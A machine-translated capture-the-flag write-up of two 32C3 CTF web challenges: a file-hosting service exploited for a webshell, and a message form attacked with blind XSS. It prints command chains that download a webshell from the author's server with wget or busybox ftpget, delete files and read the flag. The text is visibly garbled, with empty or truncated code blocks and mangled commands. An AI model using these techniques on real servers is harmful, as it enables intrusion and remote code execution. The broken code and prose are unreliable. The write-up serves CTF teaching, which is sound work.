Writeup of 32C3CTF two Web questions

Introduction to Writeup 0x00 for 32C3CTF two Web questions

As a dog for sales, I am very happy to be able to do Web problems. I have two questions: TinyHosting and Kummerkasten.

0x01 TingHosting

A new file hosting service for very small files. could you pwn it? Http: // 136.243.194.53/

You can first find a hidden src parameter on the page, add? After src = 1, the source code of the page is returned.

This means that you can upload files of any file name to the server, but the content of each file is only seven characters long.

So first google, the shortest php webshell should be 14 characters:

#! Php
      
(PS: The original code has been converted. if there is an error... sorry.
     
Obviously not long enough.
     
Later, I had a lot of brains and thought of cute *, so the important payload was:
     
#!bashz.php
     
Content:
     
#! Php
       
There are only seven characters in length. you can execute all the things in the current directory in sequence.
     
So we need to construct some execution chains. the idea at the beginning is:
     
#!bashbusybox ftpget two.dog w.php z.php
     
Among them, the content of the first four files is random. w. php is the key payload above. after executing w. php, its content is overwritten by the webshell on my server and the webshell is obtained.
     
As a result, we found that busybox ftpget supports only ip addresses but not domain names.
     
Later, we wanted to construct it through wget, and used the cross-protocol feature of 302 redirection.
     
#!bashwget wtf.two.dog z.php
     
The content of the first two files is satisfactory. z. php is an important payload and you can win webshell.
     
But taking a closer look, this question will create an index.html file under every person's directory, so the execution chain is broken and cannot work.
     
Use bashto first remove index.html
     
Structure:
     
#!bashbash bb index.html z.php
     
Bash contains no more than 7 characters, and bb contains rm. Then you can obtain a webshell through the above method, and then find a flag in the root directory.
     
  
     
After reading the practice of foreigners, it is really easy to use. we can use bash, bb, and z. php. the content of bb is ls/, cat/f *, which is simple and direct 0 0.
0x02 Kummerkasten
          
Our Admin is a little sad this time of the year. Maybe you can cheer him up at this site http: // 136.243.194.46/Please note: This challenge does not follow the flag format.
      
Hints: To build the flag, concatenate both parts and omit '32c3 _'
     
     
After entering, there was only one place to submit a message. when I looked at the page, I didn't find anything else. I felt like it was related to XSS.
     
After directly losing a payload for the blind cookie, the Echo is received:
     
  
     
Access is 403 in the past. I feel that XSS is needed to read the content of the page.
     
The original idea was to use jQuery in XSS and operate it with jQuery. The result showed that there was a page, which was too convenient.
     
With ajax, you can easily read and return pages.
     
You can see/admin/bugs and/admin/token.
     
Based on the information on the page, the key is to read two png images.
     
The final payload is as follows:
     
  
     
Then, combine the content of two shards, one mysql password and one six-digit number, that is, the FLAG.
0x03 Other
For more writeup information, refer to the following link:
     
Https://github.com/ctfs/write-ups-2015/tree/master/32c3-ctf-2015/web